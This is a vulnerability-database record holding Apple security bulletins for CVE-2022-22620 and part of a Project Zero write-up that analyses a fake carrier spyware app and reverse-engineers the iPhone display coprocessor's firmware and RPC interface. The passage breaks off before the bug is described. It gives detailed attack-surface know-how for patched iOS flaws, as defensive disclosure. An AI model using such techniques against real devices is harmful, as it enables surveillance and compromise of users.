"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "apple", "title": "About the security content of Safari 15.3", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-10T00:00:00", "id": "APPLE:02740BCB30C345C4CD19795FBD8FD739", "href": "https://support.apple.com/kb/HT213091", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-25T06:04:56", "description": "# About the security content of macOS Monterey 12.2.1\n\nThis document describes the security content of macOS Monterey 12.2.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## macOS Monterey 12.2.1\n\nReleased February 10, 2022\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22620: an anonymous researcher\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: February 10, 2022\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "apple", "title": "About the security content of macOS Monterey 12.2.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-10T00:00:00", "id": "APPLE:EF619761E522E15BAB653ACD81383CBF", "href": "https://support.apple.com/kb/HT213092", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-25T06:05:02", "description": "# About the security content of iOS 15.3.1 and iPadOS 15.3.1\n\nThis document describes the security content of iOS 15.3.1 and iPadOS 15.3.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iOS 15.3.1 and iPadOS 15.3.1\n\nReleased February 10, 2022\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22620: an anonymous researcher\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: February 10, 2022\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "apple", "title": "About the security content of iOS 15.3.1 and iPadOS 15.3.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-10T00:00:00", "id": "APPLE:52E627AE8868F50352A397AD32DB5373", "href": "https://support.apple.com/kb/HT213093", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "googleprojectzero": [{"lastseen": "2023-05-28T02:00:37", "description": "Posted by Ian Beer, Google Project Zero\n\n \n\n\nNOTE: This issue was CVE-2021-30983 was fixed in iOS 15.2 in December 2021.\n\n \n\n\nTowards the end of 2021 Google's Threat Analysis Group (TAG) shared an iPhone app with me:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioBjlvs-GjJW9ZocxERk7cU6J-bBcWIjauCAzuI6QoMvdQENbSjF6elAZ0yUpLbHfTmOzfdKWBhB_FFR8X9UF1yMqN9XSMmJSUDZ_uVX_zctpmYMaD0G6V7bi68tdJ2C-e3eyM715_cTywzOWAgSbPyazbNtMv65p0lWewhacxCox_vrztKXdRZdjB/s1874/Screenshot%202022-06-22%20at%2016.52.33.png>)\n\nApp splash screen showing the Vodafone carrier logo and the text \"My Vodafone\" (not the legitimate Vodadone app)\n\n \n \n\n\nAlthough this looks like the real [My Vodafone carrier app](<https://apps.apple.com/gb/app/my-vodafone/id370901726>) available in the App Store, it didn't come from the App Store and is not the real application from Vodafone. TAG suspects that a target receives a link to this app in an SMS, after the attacker asks the carrier to disable the target's mobile data connection. The SMS claims that in order to restore mobile data connectivity, the target must install the carrier app and includes a link to download and install this fake app.\n\n \n\n\nThis sideloading works because the app is signed with an enterprise certificate, which can be purchased for $299 via the Apple [Enterprise developer program](<https://developer.apple.com/programs/enterprise/>). This program allows an eligible enterprise to obtain an Apple-signed embedded.mobileprovision file with the ProvisionsAllDevices key set. An app signed with the developer certificate embedded within that mobileprovision file can be sideloaded on any iPhone, bypassing Apple's App Store review process. While we understand that the Enterprise developer program is designed for companies to push \"trusted apps\" to their staff's iOS devices, in this case, it appears that it was being used to sideload this fake carrier app.\n\n \n\n\nIn collaboration with Project Zero, [TAG has published an additional post with more details around the targeting and the actor](<https://blog.google/threat-analysis-group/italian-spyware-vendor-targets-users-in-italy-and-kazakhstan/>). The rest of this blogpost is dedicated to the technical analysis of the app and the exploits contained therein.\n\n## App structure\n\nThe app is broken up into multiple frameworks. InjectionKit.framework is a generic privilege escalation exploit wrapper, exposing the primitives you'd expect (kernel memory access, entitlement injection, amfid bypasses) as well as higher-level operations like app installation, file creation and so on.\n\n \n\n\nAgent.framework is partially obfuscated but, as the name suggests, seems to be a basic agent able to find and exfiltrate interesting files from the device like the Whatsapp messages database.\n\n \n\n\nSix privilege escalation exploits are bundled with this app. Five are well-known, publicly available N-day exploits for older iOS versions. The sixth is not like those others at all.\n\n \n\n\nThis blog post is the story of the last exploit and the month-long journey to understand it.\n\n## Something's missing? Or am I missing something?\n\nAlthough all the exploits were different, five of them shared a common high-level structure. An initial phase where the kernel heap was manipulated to control object placement. Then the triggering of a kernel vulnerability followed by well-known steps to turn that into something useful, perhaps by disclosing kernel memory then building an arbitrary kernel memory write primitive.\n\n \n\n\nThe sixth exploit didn't have anything like that.\n\n \n\n\nPerhaps it could be triggering a kernel logic bug like Linuz Henze's [Fugu14](<https://github.com/LinusHenze/Fugu14>) exploit, or a very bad memory safety issue which gave fairly direct kernel memory access. But neither of those seemed very plausible either. It looked, quite simply, like an iOS kernel exploit from a decade ago, except one which was first quite carefully checking that it was only running on an iPhone 12 or 13.\n\n \n\n\nIt contained log messages like:\n\n \n\n\nprintf(\"Failed to prepare fake vtable: 0x%08x\", ret);\n\n \n\n\nwhich seemed to happen far earlier than the exploit could possibly have defeated mitigations like KASLR and PAC.\n\n \n\n\nShortly after that was this log message:\n\n \n\n\nprintf(\"Waiting for R/W primitives...\");\n\n \n\n\nWhy would you need to wait?\n\n \n\n\nThen shortly after that:\n\n \n\n\nprintf(\"Memory read/write and callfunc primitives ready!\");\n\n \n\n\nUp to that point the exploit made only four IOConnectCallMethod calls and there were no other obvious attempts at heap manipulation. But there was another log message which started to shed some light:\n\n \n\n\nprintf(\"Unexpected data read from DCP: 0x%08x\", v49);\n\n## DCP?\n\nIn October 2021 Adam Donenfeld tweeted this:\n\n \n\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgizH1ivW5VjBBB2oIDHbvRvevtn3SaYgaWlwf_F_bWSAb9b9kMrycHwATVj_tyHb22sjTc9jJmwQTc-ehvzmruznZtyWToUNiEfyif6nl3latUr3STT8P0YSL0MgxB8_t-CjNLdHITK0kpCcuYPJhFN7zuOX6s1DqOQVQxthrazNfK0ktsvn4Na1hl/s1988/Screenshot%202022-06-22%20at%2016.52.56.png>)\n\nDCP is the \"Display Co-Processor\" which ships with iPhone 12 and above and all M1 Macs.\n\n \n\n\nThere's little public information about the DCP; the most comprehensive comes from the [Asahi linux project](<https://asahilinux.org/>) which is porting linux to M1 Macs. In their [August 2021](<https://asahilinux.org/2021/08/progress-report-august-2021/>) and [September 2021](<https://asahilinux.org/2021/10/progress-report-september-2021/>) updates they discussed their DCP reverse-engineering efforts and the open-source DCP client written by [@alyssarzg](<https://twitter.com/alyssarzg>). Asahi describe the DCP like this:\n\n \n\n\nOn most mobile SoCs, the display controller is just a piece of hardware with simple registers. While this is true on the M1 as well, Apple decided to give it a twist. They added a coprocessor to the display engine (called DCP), which runs its own firmware (initialized by the system bootloader), and moved most of the display driver into the coprocessor. But instead of doing it at a natural driver boundary\u2026 they took half of their macOS C++ driver, moved it into the DCP, and created a remote procedure call interface so that each half can call methods on C++ objects on the other CPU! \n\n<https://asahilinux.org/2021/08/progress-report-august-2021/>\n\n \n\n\nThe Asahi linux project reverse-engineered the API to talk to the DCP but they are restricted to using Apple's DCP firmware (loaded by iBoot) - they can't use a custom DCP firmware. Consequently their documentation is limited to the DCP RPC API with few details of the DCP internals.\n\n## Setting the stage\n\nBefore diving into DCP internals it's worth stepping back a little. What even is a co-processor in a modern, highly integrated SoC (System-on-a-Chip) and what might the consequences of compromising it be?\n\n \n\n\nYears ago a co-processor would likely have been a physically separate chip. Nowadays a large number of these co-processors are integrated along with their interconnects directly onto a single die, even if they remain fairly independent systems. We can see in this M1 die shot from [Tech Insights](<https://www.techinsights.com/blog/two-new-apple-socs-two-market-events-apple-a14-and-m1>) that the CPU cores in the middle and right hand side take up only around 10% of the die:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjtJjSN0qdOa1cKBG72s9uuwcVKU5evSg9CiIPtpbbFox0fGgW7XZQU1Jj4IezjIdHC23sJbnklT6acyTFiqB-0-qmcj35Gq-ZZyTHP0DcfFkBztA0DL2P3lhYy2n0k8wgzmzaYX8IMeKosr4uuWMXT-wplsuJQmfR4LDgFzWAUZARvx5rfWjWiusz/s1116/Screenshot%202022-06-22%20at%2016.53.12.png>)\n\nM1 die-shot from techinsights.com with possible location of DCP added\n\n<https://www.techinsights.com/blog/two-new-apple-socs-two-market-events-apple-a14-and-m1>\n\n \n\n\nCompanies like [SystemPlus](<https://www.systemplus.fr/>) perform [very thorough analysis of these dies](<https://www.systemplus.fr/wp-content/uploads/2020/12/SP20608-Apple-M1-System-on-Chip-Sample.pdf>). Based on their analysis the DCP is likely the rectangular region indicated on this M1 die. It takes up around the same amount of space as the four high-efficiency cores seen in the centre, though it seems to be mostly SRAM.\n\n \n\n\nWith just this low-resolution image it's not really possible to say much more about the functionality or capabilities of the DCP and what level of system access it has. To answer those questions we'll need to take a look at the firmware.\n\n## My kingdom for a .dSYM!\n\nThe first step is to get the DCP firmware image. iPhones (and now M1 macs) use .ipsw files for system images. An .ipsw is really just a .zip archive and the Firmware/ folder in the extracted .zip contains all the firmware for the co-processors, modems etc. The DCP firmware is this file:\n\n* * *\n\n \n\n\nFirmware/dcp/iphone13dcp.im4p\n\n \n\n\nThe im4p in this case is just a 25 byte header which we can discard:\n\n \n\n\n$ dd if=iphone13dcp.im4p of=iphone13dcp bs=25 skip=1\n\n$ file iphone13dcp\n\niphone13dcp: Mach-O 64-bit preload executable arm64\n\n \n\n\nIt's a Mach-O! Running nm -a to list all symbols shows that the binary has been fully stripped:\n\n \n\n\n$ nm -a iphone13dcp\n\niphone13dcp: no symbols\n\n \n\n\nFunction names make understanding code significantly easier. From looking at the handful of strings in the exploit some of them looked like they might be referencing symbols in a DCP firmware image (\"M3_CA_ResponseLUT read: 0x%08x\" for example) so I thought perhaps there might be a DCP firmware image where the symbols hadn't been stripped.\n\n \n\n\nSince the firmware images are distributed as .zip files and Apple's servers support range requests with a bit of python and the [partialzip](<https://github.com/marcograss/partialzip>) tool we can relatively easily and quickly get every beta and release DCP firmware. I checked over 300 distinct images; every single one was stripped.\n\n \n\n\nGuess we'll have to do this the hard way!\n\n## Day 1; Instruction 1\n\n$ otool -h raw_fw/iphone13dcp\n\nraw_fw/iphone13dcp:\n\nMach header\n\nmagic cputype cpusubtype caps filetype ncmds sizeofcmds flags\n\n0xfeedfacf 0x100000C 0 0x00 5 5 2240 0x00000001\n\n \n\n\nThat cputype is plain arm64 (ArmV8) without pointer authentication support. The binary is fairly large (3.7MB) and IDA's autoanalysis detects over 7000 functions.\n\n \n\n\nWith any brand new binary I usually start with a brief look through the function names and the strings. The binary is stripped so there are no function name symbols but there are plenty of C++ function names as strings:\n\n \n\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhY8rBSaTDR2W5pSgk9ssaCqN8M8Nuhd5_x6FkNSqOI-jRDFVab_jrrkZlN1DS2FKf9zeAPPDFkE30kNCPpN3PES9RdvBLj4L6G78zq134bTQcR1VEe7J30tYPoqqZ82z1cPwUcvF2wzfoOEbDf3l_4ucxpuOZFC2NLyrMYV_luJ_5dysxanajqsi-N/s1830/Screenshot%202022-06-22%20at%2016.53.26.png>)\n\nThe cross-references to those strings look like this:\n\n \n\n\nlog(0x40000001LL,\n\n\"UPBlock_ALSS.cpp\",\n\n341,\n\n\"%s: capture buffer exhausted, aborting capture\\n\",\n\n\"void IOMFB::UPBlock_ALSS::send_data(uint64_t, uint32_t)\"); \n \n--- \n \n \n\n\nThis is almost certainly a logging macro which expands __FILE__, __LINE__ and __PRETTY_FUNCTION__. This allows us to start renaming functions and finding vtable pointers.\n\n## Object structure\n\nFrom the Asahi linux blog posts we know that the DCP is using an Apple-proprietary RTOS called RTKit for which there is very little public information. There are some strings in the binary with the exact version:\n\n \n\n\nADD X8, X8, #aLocalIphone13d@PAGEOFF ; \"local-iphone13dcp.release\"\n\nADD X9, X9, #aRtkitIos182640@PAGEOFF ; \"RTKit_iOS-1826.40.9.debug\"\n\n \n\n\nThe code appears to be predominantly C++. There appear to be multiple C++ object hierarchies; those involved with this vulnerability look a bit like IOKit C++ objects. Their common base class looks like this:\n\n \n\n\nstruct __cppobj RTKIT_RC_RTTI_BASE\n\n{\n\nRTKIT_RC_RTTI_BASE_vtbl *__vftable /*VFT*/;\n\nuint32_t refcnt;\n\nuint32_t typeid;\n\n}; \n \n--- \n \n \n\n\n(These structure definitions are in the format IDA uses for C++-like objects)\n\n \n\n\nThe RTKit base class has a vtable pointer, a reference count and a four-byte Run Time Type Information (RTTI) field - a 4-byte ASCII identifier like BLHA, WOLO, MMAP, UNPI, OSST, OSBO and so on. These identifiers look a bit cryptic but they're quite descriptive once you figure them out (and I'll describe the relevant ones as we encounter them.)\n\n \n\n\nThe base type has the following associated vtable:\n\n \n\n\nstruct /*VFT*/ RTKIT_RC_RTTI_BASE_vtbl\n\n{\n\nvoid (__cdecl *take_ref)(RTKIT_RC_RTTI_BASE *this);\n\nvoid (__cdecl *drop_ref)(RTKIT_RC_RTTI_BASE *this);\n\nvoid (__cdecl *take_global_type_ref)(RTKIT_RC_RTTI_BASE *this);\n\nvoid (__cdecl *drop_global_type_ref)(RTKIT_RC_RTTI_BASE *this);\n\nvoid (__cdecl *getClassName)(RTKIT_RC_RTTI_BASE *this);\n\nvoid (__cdecl *dtor_a)(RTKIT_RC_RTTI_BASE *this);\n\nvoid (__cdecl *unk)(RTKIT_RC_RTTI_BASE *this);\n\n}; \n \n--- \n \n## Exploit flow\n\nThe exploit running in the app starts by opening an IOKit user client for the AppleCLCD2 service. AppleCLCD seems to be the application processor of IOMobileFrameBuffer and AppleCLCD2 the DCP version.\n\n \n\n\nThe exploit only calls 3 different external method selectors on the AppleCLCD2 user client: 68, 78 and 79.\n\n \n\n\nThe one with the largest and most interesting-looking input is 78, which corresponds to this user client method in the kernel driver:\n\n \n\n\nIOReturn\n\nIOMobileFramebufferUserClient::s_set_block(\n\nIOMobileFramebufferUserClient *this,\n\nvoid *reference,\n\nIOExternalMethodArguments *args)\n\n{\n\nconst unsigned __int64 *extra_args;\n\nu8 *structureInput;\n\nstructureInput = args-&gt;structureInput;\n\nif ( structureInput &amp;&amp; args-&gt;scalarInputCount &gt;= 2 )\n\n{\n\nif ( args-&gt;scalarInputCount == 2 )\n\nextra_args = 0LL;\n\nelse\n\nextra_args = args-&gt;scalarInput + 2;\n\nreturn this-&gt;framebuffer_ap-&gt;set_block_dcp(\n\nthis-&gt;task,\n\nargs-&gt;scalarInput[0],\n\nargs-&gt;scalarInput[1],\n\nextra_args,\n\nargs-&gt;scalarInputCount - 2,\n\nstructureInput,\n\nargs-&gt;structureInputSize);\n\n} else {\n\nreturn 0xE00002C2;\n\n}\n\n} \n \n--- \n \n \n\n\nthis unpacks the IOConnectCallMethod arguments and passes them to:\n\n \n\n\nIOMobileFramebufferAP::set_block_dcp(\n\nIOMobileFramebufferAP *this,\n\ntask *task,\n\nint first_scalar_input,\n\nint second_scalar_input,\n\nconst unsigned __int64 *pointer_to_remaining_scalar_inputs,\n\nunsigned int scalar_input_count_minus_2,\n\nconst unsigned __int8 *struct_input,\n\nunsigned __int64 struct_input_size) \n \n--- \n \n \n\n\nThis method uses some autogenerated code to serialise the external method arguments into a buffer like this: \n\n \n\n\narg_struct:\n\n{\n\nstruct task* task\n\nu64 scalar_input_0\n\nu64 scalar_input_1\n\nu64[] remaining_scalar_inputs\n\nu64 cntExtraScalars\n\nu8[] structInput\n\nu64 CntStructInput\n\n} \n \n--- \n \n \n\n\nwhich is then passed to UnifiedPipeline2::rpc along with a 4-byte ASCII method identifier ('A435' here):\n\n \n\n\nUnifiedPipeline2::rpc(\n\n'A435',\n\narg_struct,\n\n0x105Cu,\n\n&amp;retval_buf,\n\n4u); \n \n--- \n \n \n\n\nUnifiedPipeline2::rpc calls DCPLink::rpc which calls AppleDCPLinkService::rpc to perform one more level of serialisation which packs the method identifier and a \"stream identifier\" together with the arg_struct shown above.\n\n \n\n\nAppleDCPLinkService::rpc then calls rpc_caller_gated to allocate space in a shared memory buffer, copy the buffer into there then signal to the DCP that a message is available.\n\n \n\n\nEffectively the implementation of the IOMobileFramebuffer user client has been moved on to the DCP and the external method interface is now a proxy shim, via shared memory, to the actual implementations of the external methods which run on the DCP.\n\n## Exploit flow: the other side\n\nThe next challenge is to find where the messages start being processed on the DCP. Looking through the log strings there's a function which is clearly called \u200b\u200brpc_callee_gated \\- quite likely that's the receive side of the function rpc_caller_gated we saw earlier.\n\n \n\n\nrpc_callee_gated unpacks the wire format then has an enormous switch statement which maps all the 4-letter RPC codes to function pointers:\n\n \n\n\nswitch ( rpc_id )\n\n{\n\ncase 'A000':\n\ngoto LABEL_146;\n\ncase 'A001':\n\nhandler_fptr = callback_handler_A001;\n\nbreak;\n\ncase 'A002':\n\nhandler_fptr = callback_handler_A002;\n\nbreak;\n\ncase 'A003':\n\nhandler_fptr = callback_handler_A003;\n\nbreak;\n\ncase 'A004':\n\nhandler_fptr = callback_handler_A004;\n\nbreak;\n\ncase 'A005':\n\nhandler_fptr = callback_handler_A005;\n\nbreak; \n \n--- \n \n \n\n\nAt the the bottom of this switch statement is the invocation of the callback handler:\n\n \n\n\nret = handler_fptr(\n\nmeta,\n\nin_struct_ptr,\n\nin_struct_size,\n\nout_struct_ptr,\n\nout_struct_size); \n \n--- \n \n \n\n\nin_struct_ptr points to a copy of the serialised IOConnectCallMethod arguments we saw being serialized earlier on the application processor:\n\n \n\n\narg_struct:\n\n{\n\nstruct task* task\n\nu64 scalar_input_0\n\nu64 scalar_input_1\n\nu64[] remaining_scalar_inputs\n\nu32 cntExtraScalars\n\nu8[] structInput\n\nu64 cntStructInput\n\n} \n \n--- \n \n \n\n\nThe callback unpacks that buffer and calls a C++ virtual function:\n\n \n\n\nunsigned int\n\ncallback_handler_A435(\n\nu8* meta,\n\nvoid *args,\n\nuint32_t args_size,\n\nvoid *out_struct_ptr,\n\nuint32_t out_struct_size\n\n{\n\nint64 instance_id;\n\nuint64_t instance;\n\nint err;\n\nint retval;\n\nunsigned int result;\n\ninstance_id = meta-&gt;instance_id;\n\ninstance =\n\nglobal_instance_table[instance_id].IOMobileFramebufferType;\n\nif ( !instance ) {\n\nlog_fatal(\n\n\"IOMFB: %s: no instance for instance ID: %u\\n\",\n\n\"static T *IOMFB::InstanceTracker::instance\"\n\n\"(IOMFB::InstanceTracker::tracked_entity_t, uint32_t)\"\n\n\" [T = IOMobileFramebuffer]\",\n\ninstance_id);\n\n}\n\nerr = (instance-16)-&gt;vtable_0x378( // virtual call\n\n(instance-16),\n\nargs-&gt;task,\n\nargs-&gt;scalar_input_0,\n\nargs-&gt;scalar_input_1,\n\nargs-&gt;remaining_scalar_inputs,\n\nargs-&gt;cntExtraScalars,\n\nargs-&gt;structInput,\n\nargs-&gt;cntStructInput);\n\nretval = convert_error(err);\n\nresult = 0;\n\n*(_DWORD *)out_struct_ptr = retval;\n\nreturn result;\n\n} \n \n--- \n \n \n\n\nThe challenge here is to figure out where that virtual call goes. The object is being looked up in a global table based on the instance id. We can't just set a breakpoint and whilst emulating the firmware is probably possible that would likely be a long project in itself. I took a hackier approach: we know that the vtable needs to be at least 0x380 bytes large so just go through all those vtables, decompile them and see if the prototypes look reasonable!\n\n \n\n\nThere's one clear match in the vtable for the UNPI type:\n\nUNPI::set_block(\n\nUNPI* this,\n\nstruct task* caller_task_ptr,\n\nunsigned int first_scalar_input,\n\nint second_scalar_input,\n\nint *remaining_scalar_inputs,\n\nuint32_t cnt_remaining_scalar_inputs,\n\nuint8_t *structure_input_buffer,\n\nuint64_t structure_input_size) \n \n--- \n \n \n\n\nHere's my reversed implementation of UNPI::set_block\n\nUNPI::set_block(\n\nUNPI* this,\n\nstruct task* caller_task_ptr,\n\nunsigned int first_scalar_input,\n\nint second_scalar_input,\n\nint *remaining_scalar_inputs,\n\nuint32_t cnt_remaining_scalar_inputs,\n\nuint8_t *structure_input_buffer,\n\nuint64_t structure_input_size)\n\n{\n\nstruct block_handler_holder *holder;\n\nstruct metadispatcher metadisp;\n\nif ( second_scalar_input )\n\nreturn 0x80000001LL;\n\nholder = this-&gt;UPPipeDCP_H13P-&gt;block_handler_holders;\n\nif ( !holder )\n\nreturn 0x8000000BLL;\n\nmetadisp.address_of_some_zerofill_static_buffer = &amp;unk_3B8D18;\n\nmetadisp.handlers_holder = holder;\n\nmetadisp.structure_input_buffer = structure_input_buffer;\n\nmetadisp.structure_input_size = structure_input_size;\n\nmetadisp.remaining_scalar_inputs = remaining_scalar_inputs;\n\nmetadisp.cnt_remaining_sclar_input = cnt_remaining_scalar_inputs;\n\nmetadisp.some_flags = 0x40000000LL;\n\nmetadisp.dispatcher_fptr = a_dispatcher;\n\nmetadisp.offset_of_something_which_looks_serialization_related = &amp;off_1C1308;\n\nreturn metadispatch(holder, first_scalar_input, 1, caller_task_ptr, structure_input_buffer, &amp;metadisp, 0);\n\n} \n \n--- \n \n \n\n\nThis method wraps up the arguments into another structure I've called metadispatcher:\n\n \n\n\nstruct __attribute__((aligned(8))) metadispatcher\n\n{\n\nuint64_t address_of_some_zerofill_static_buffer;\n\nuint64_t some_flags;\n\n__int64 (__fastcall *dispatcher_fptr)(struct metadispatcher *, struct BlockHandler *, __int64, _QWORD);\n\nuint64_t offset_of_something_which_looks_serialization_related;\n\nstruct block_handler_holder *handlers_holder;\n\nuint64_t structure_input_buffer;\n\nuint64_t structure_input_size;\n\nuint64_t remaining_scalar_inputs;\n\nuint32_t cnt_remaining_sclar_input;\n\n}; \n \n--- \n \n \n\n\nThat metadispatcher object is then passed to this method:\n\n \n\n\nreturn metadispatch(holder, first_scalar_input, 1, caller_task_ptr, structure_input_buffer, &amp;metadisp, 0); \n \n--- \n \n \n\n\nIn there we reach this code:\n\n \n\n\nblock_type_handler = lookup_a_handler_for_block_type_and_subtype(\n\na1,\n\nfirst_scalar_input, // block_type\n\na3); // subtype \n \n--- \n \n \n\n\nThe exploit calls this set_block external method twice, passing two different values for first_scalar_input, 7 and 19. Here we can see that those correspond to looking up two different block handler objects here.\n\n \n\n\nThe lookup function searches a linked list of block handler structures; the head of the list is stored at offset 0x1448 in the UPPipeDCP_H13P object and registered dynamically by a method I've named add_handler_for_block_type:\n\n \n\n\nadd_handler_for_block_type(struct block_handler_holder *handler_list,\n\nstruct BlockHandler *handler) \n \n--- \n \nThe logging code tells us that this is in a file called IOMFBBlockManager.cpp. IDA finds 44 cross-references to this method, indicating that there are probably that many different block handlers. The structure of each registered block handler is something like this:\n\n \n\n\nstruct __cppobj BlockHandler : RTKIT_RC_RTTI_BASE\n\n{\n\nuint64_t field_16;\n\nstruct handler_inner_types_entry *inner_types_array;\n\nuint32_t n_inner_types_array_entries;\n\nuint32_t field_36;\n\nuint8_t can_run_without_commandgate;\n\nuint32_t block_type;\n\nuint64_t list_link;\n\nuint64_t list_other_link;\n\nuint32_t some_other_type_field;\n\nuint32_t some_other_type_field2;\n\nuint32_t expected_structure_io_size;\n\nuint32_t field_76;\n\nuint64_t getBlock_Impl;\n\nuint64_t setBlock_Impl;\n\nuint64_t field_96;\n\nuint64_t back_ptr_to_UPPipeDCP_H13P;\n\n}; \n \n--- \n \n \n\n\nThe RTTI type is BLHA (BLock HAndler.)\n\n \n\n\nFor example, here's the codepath which builds and registers block handler type 24:\n\n \n\n\nBLHA_24 = (struct BlockHandler *)CXXnew(112LL);\n\nBLHA_24-&gt;__vftable = (BlockHandler_vtbl *)BLHA_super_vtable;\n\nBLHA_24-&gt;block_type = 24;\n\nBLHA_24-&gt;refcnt = 1;\n\nBLHA_24-&gt;can_run_without_commandgate = 0;\n\nBLHA_24-&gt;some_other_type_field = 0LL;\n\nBLHA_24-&gt;expected_structure_io_size = 0xD20;\n\ntypeid = typeid_BLHA();\n\nBLHA_24-&gt;typeid = typeid;\n\nmodify_typeid_ref(typeid, 1);\n\nBLHA_24-&gt;__vftable = vtable_BLHA_subclass_type_24;\n\nBLHA_24-&gt;inner_types_array = 0LL;\n\nBLHA_24-&gt;n_inner_types_array_entries = 0;\n\nBLHA_24-&gt;getBlock_Impl = BLHA_24_getBlock_Impl;\n\nBLHA_24-&gt;setBlock_Impl = BLHA_24_setBlock_Impl;\n\nBLHA_24-&gt;field_96 = 0LL;\n\nBLHA_24-&gt;back_ptr_to_UPPipeDCP_H13P = a1;\n\nadd_handler_for_block_type(list_holder, BLHA_24); \n \n--- \n \n \n\n\nEach block handler optionally has getBlock_Impl and setBlock_Impl function pointers which appear to implement the actual setting and getting operations.\n\n \n\n\nWe can go through all the callsites which add block handlers; tell IDA the type of the arguments and name all the getBlock and setBlock implementations:\n\n 